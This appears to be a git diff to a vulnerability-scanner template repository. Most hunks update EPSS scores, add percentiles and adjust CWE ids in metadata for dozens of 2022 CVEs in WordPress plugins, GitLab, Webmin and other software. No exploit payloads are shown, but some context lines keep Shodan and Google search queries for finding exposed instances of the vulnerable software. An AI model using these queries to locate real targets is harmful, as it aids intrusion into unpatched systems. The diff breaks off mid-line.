c32d88191a..b01046aad1 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0220 cwe-id: CWE-116 - epss-score: 0.00165 + epss-score: 0.00124 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.46073 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 539ac3c285..f38f4886d5 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0234 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 1 google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher" diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 07690b57bd..f8ccfdcc37 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index 25b5f011c4..69cb9bf825 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0281 cwe-id: CWE-200 - epss-score: 0.00478 + epss-score: 0.00492 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.7314 metadata: max-request: 1 shodan-query: http.favicon.hash:780351152 diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index b89374f105..e3b1fcd814 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0288 cwe-id: CWE-79 - epss-score: 0.00119 + epss-score: 0.00141 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.49173 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index 5ed5c1c45a..d39700010b 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00099 cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40272 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index e2318a9e01..7f2829e256 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0349 cwe-id: CWE-89 - epss-score: 0.01125 + epss-score: 0.01307 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.84219 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 756811931f..3a7d249aec 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -14,8 +14,9 @@ info: cvss-score: 5.4 cve-id: CVE-2022-0378 cwe-id: CWE-79 - epss-score: 0.00133 + epss-score: 0.001 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.40521 metadata: max-request: 1 shodan-query: http.favicon.hash:780351152 diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index d298aec59f..b947d1e954 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0381 cwe-id: CWE-79 - epss-score: 0.00216 + epss-score: 0.00218 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.59071 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index f44c52e493..991f545c34 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0412 cwe-id: CWE-89 - epss-score: 0.01165 + epss-score: 0.02963 cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89567 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 20bcd04254..37acb2092a 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0415 - cwe-id: CWE-434,CWE-20 + cwe-id: CWE-20,CWE-434 epss-score: 0.27369 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* + epss-percentile: 0.96168 metadata: max-request: 6 verified: true diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 4af20091fd..d8be0fb28b 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0422 cwe-id: CWE-79 - epss-score: 0.00113 + epss-score: 0.00133 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.47722 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 6ebceb6887..245596be85 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0432 cwe-id: CWE-1321 - epss-score: 0.00112 + epss-score: 0.001 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* + epss-percentile: 0.40521 metadata: max-request: 1 vendor: joinmastodon diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index e53a7af4b3..993d86e3bd 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0434 cwe-id: CWE-89 - epss-score: 0.02077 + epss-score: 0.02274 cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88217 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index 8a6205c25a..2543e0ad21 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0437 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.001 cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* + epss-percentile: 0.40521 metadata: max-request: 2 framework: node.js diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index cd17e0fa87..5a1e1f6a07 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0441 cwe-id: CWE-269 - epss-score: 0.11246 + epss-score: 0.37209 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96672 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index 07fa4965d6..aaa714f008 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.1 cve-id: CVE-2022-0482 cwe-id: CWE-359,CWE-863 - epss-score: 0.01927 + epss-score: 0.02425 cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88566 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 5a6c10410b..84ac33bc47 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00112 cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.43647 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 16e27e277f..3a4b92fee9 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -18,8 +18,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0540 cwe-id: CWE-287 - epss-score: 0.16173 + epss-score: 0.16241 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* + epss-percentile: 0.95289 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index dd2bf1faa7..7cb7db8bb6 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-918 epss-score: 0.00694 cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.77706 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 4b071dd996..7aa8b9dcb2 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0594 cwe-id: CWE-863 - epss-score: 0.00243 + epss-score: 0.00257 cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.62773 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index df3d2fcba4..1092e3601b 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00135 cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.48139 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 0ab59c3d88..f390b778a7 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 9f398288f7..03f80548a9 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0653 cwe-id: CWE-79 - epss-score: 0.00232 + epss-score: 0.00274 cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.64008 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 6ad4967e5d..4a69a25efb 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -13,8 +13,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0656 cwe-id: CWE-552 - epss-score: 0.0057 + epss-score: 0.00641 cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.76583 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/udraw" diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index 703f84eac7..b095be07cf 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-0660 cwe-id: CWE-209 - epss-score: 0.00596 + epss-score: 0.00654 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.76848 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 07c9a9f90f..2b315491d1 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0678 cwe-id: CWE-79 - epss-score: 0.00145 + epss-score: 0.00135 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.4804 metadata: max-request: 1 shodan-query: http.favicon.hash:780351152 diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index 2074cfb247..ba00e54bfa 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0679 cwe-id: CWE-22 - epss-score: 0.01408 + epss-score: 0.02484 cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.88704 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index ccd4ee59c5..4f91798038 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0692 cwe-id: CWE-601 - epss-score: 0.00112 + epss-score: 0.00133 cpe: cpe:2.3:a:alltube_project:alltube:*:*:*:*:*:*:*:* + epss-percentile: 0.47722 metadata: max-request: 1 vendor: alltube_project diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 65fcef0bbf..8492801723 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0693 cwe-id: CWE-89 - epss-score: 0.01065 + epss-score: 0.01196 cpe: cpe:2.3:a:devbunch:master_elements:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.83424 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 987a9dc512..e2d925e747 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -10,13 +10,15 @@ info: - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735 - https://nvd.nist.gov/vuln/detail/cve-2022-0735 + - https://gitlab.com/gitlab-org/gitlab/-/issues/353529 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0735 cwe-id: CWE-863 - epss-score: 0.04365 + epss-score: 0.02744 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* + epss-percentile: 0.89212 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 490bbfb971..b18b618fe2 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-89 epss-score: 0.011 cpe: cpe:2.3:a:quantumcloud:infographic_maker:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82632 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 8872c77b35..92f801bb28 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.011 cpe: cpe:2.3:a:quantumcloud:simple_link_directory:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82632 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 3f4be89774..13457ff347 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0769 cwe-id: CWE-89 - epss-score: 0.01065 + epss-score: 0.01196 cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.83424 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index d80b89ba7c..e0909bbeb6 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0773 cwe-id: CWE-89 - epss-score: 0.01851 + epss-score: 0.02077 cpe: cpe:2.3:a:documentor_project:documentor:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 53f40cadb9..684aa7d044 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0776 cwe-id: CWE-79 - epss-score: 0.00113 + epss-score: 0.00133 cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:* + epss-percentile: 0.47722 metadata: framework: node.js vendor: revealjs diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 190204e8b0..94a215e90f 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0781 cwe-id: CWE-89 - epss-score: 0.00866 + epss-score: 0.00974 cpe: cpe:2.3:a:nirweb:nirweb_support:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.81449 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 0c658032ab..23529ec3f8 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.02077 cpe: cpe:2.3:a:title_experiments_free_project:title_experiments_free:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 0420b71b6d..d5b4749746 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.02077 cpe: cpe:2.3:a:daily_prayer_time_project:daily_prayer_time:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index d07aeb4e4d..ccd60d3676 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0786 cwe-id: CWE-89 - epss-score: 0.01515 + epss-score: 0.01851 cpe: cpe:2.3:a:iqonic:kivicare:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.8685 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 25c76b7739..f4bda69744 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0788 cwe-id: CWE-89 - epss-score: 0.01851 + epss-score: 0.02077 cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 059e7e0130..5e645496b8 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0817 cwe-id: CWE-89 - epss-score: 0.01851 + epss-score: 0.02077 cpe: cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index 15645430ed..e360594d7a 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-0824 cwe-id: CWE-284,CWE-863 - epss-score: 0.97237 + epss-score: 0.97243 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* + epss-percentile: 0.99757 metadata: max-request: 2 vendor: webmin diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 4bd61d6c53..e163be81cc 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0826 cwe-id: CWE-89 - epss-score: 0.01851 + epss-score: 0.02077 cpe: cpe:2.3:a:wp-video-gallery-free_project:wp-video-gallery-free:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 9945439c91..764ceb9e4f 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0827 cwe-id: CWE-89 - epss-score: 0.01515 + epss-score: 0.01851 cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.8685 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 6790fad535..341df2de26 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.02077 cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 281b3fea4c..b29c5dbf42 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00359 cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.68676 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 0e33884110..c696eec7a9 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0867 cwe-id: CWE-89 - epss-score: 0.03029 + epss-score: 0.04152 cpe: cpe:2.3:a:reputeinfosystems:pricing_table:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9107 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0869.yaml b/http/cves/2022/CVE-2022-0869.yaml index 20efbcbb1e..069c9c202c 100644 --- a/http/cves/2022/CVE-2022-0869.yaml +++ b/http/cves/2022/CVE-2022-0869.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-0869 cwe-id: CWE-601 - epss-score: 0.0013 + epss-score: 0.00153 cpe: cpe:2.3:a:spirit-project:spirit:*:*:*:*:*:*:*:* + epss-percentile: 0.50846 metadata: max-request: 4 vendor: spirit-project diff --git a/http/cves/2022/CVE-2022-0870.yaml b/http/cves/2022/CVE-2022-0870.yaml index 1d8c058b78..6da70761f6 100644 --- a/http/cves/2022/CVE-2022-0870.yaml +++ b/http/cves/2022/CVE-2022-0870.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 - epss-score: 0.00185 + epss-score: 0.00218 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* + epss-percentile: 0.59068 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-0885.yaml b/http/cves/2022/CVE-2022-0885.yaml index e0f1401c08..8943389aa0 100644 --- a/http/cves/2022/CVE-2022-0885.yaml +++ b/http/cves/2022/CVE-2022-0885.yaml @@ -14,9 +14,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0885 - cwe-id: CWE-94 - epss-score: 0.02711 + cwe-id: CWE-862 + epss-score: 0.13941 cpe: cpe:2.3:a:memberhero:member_hero:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94944 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-0928.yaml b/http/cves/2022/CVE-2022-0928.yaml index aff15180a8..1cd4c897ca 100644 --- a/http/cves/2022/CVE-2022-0928.yaml +++ b/http/cves/2022/CVE-2022-0928.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00192 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.55945 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 4c36fcde3d..391c27287a 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-0948 cwe-id: CWE-89 - epss-score: 0.04066 + epss-score: 0.03849 cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90743 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 6e6fd9d723..e795098e19 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-89 epss-score: 0.02077 cpe: cpe:2.3:a:stopbadbots:block_and_stop_bad_bots:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87641 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-0952.yaml b/http/cves/2022/CVE-2022-0952.yaml index f55b9be861..f5a9b6a037 100644 --- a/http/cves/2022/CVE-2022-0952.yaml +++ b/http/cves/2022/CVE-2022-0952.yaml @@ -14,8 +14,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-0952 cwe-id: CWE-352 - epss-score: 0.01735 + epss-score: 